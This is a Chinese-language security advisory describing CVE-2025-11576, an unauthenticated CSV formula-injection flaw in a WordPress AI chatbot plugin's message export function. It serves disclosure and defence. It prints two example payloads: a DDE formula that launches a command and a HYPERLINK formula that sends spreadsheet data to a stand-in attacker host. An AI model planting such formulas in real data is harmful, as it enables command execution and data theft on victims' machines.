CVE-2025-11576AI Chatbot Free Models是WordPress平台上广受欢迎的客服聊天和虚拟助手插件。该插件在1.6.5及以下所有版本中存在严重的CSV注入漏洞。漏洞根源在于插件的'newcodebyte_chatbot_export_messages'函数对用户输入缺乏充分的输入验证和清理。攻击者无需任何认证即可利用此漏洞,通过聊天功能向系统注入包含恶意公式的字符串。当管理员或普通用户导出聊天记录为CSV文件并使用Microsoft Excel或其他电子表格软件打开时,嵌入的恶意公式将被自动执行,从而可能导致远程代码执行(RCE)。CSV注入(也称为公式注入或Excel公式注入)是一种被低估但危害严重的安全漏洞,攻击者利用电子表格软件的公式计算功能执行任意代码。此漏洞影响所有使用该插件的WordPress网站,需要立即采取修复措施。
漏洞存在于WordPress AI Chatbot插件的消息导出功能中。具体来说,'newcodebyte_chatbot_export_messages'函数在处理用户通过聊天界面提交的消息时,未对特殊字符(如=、+、-、@等Excel公式触发字符)进行转义或过滤。当这些包含公式触发符的用户输入被写入CSV文件时,电子表格软件会在打开文件时尝试解析并执行这些公式。攻击者可以构造形如'=CMD|'/C calc'!A0'或'=HYPERLINK("http://attacker.com/steal?data="&A1)'的恶意载荷。当受害者打开导出的CSV文件时,Excel会执行公式代码,可能导致:1)启动系统命令解释器执行任意系统命令;2)将敏感电子表格数据发送到外部攻击者控制的服务器;3)在某些配置下执行恶意宏代码。攻击成功的关键在于用户交互——需要用户主动打开并查看导出的CSV文件,这使得该漏洞在社会工程攻击中特别有效。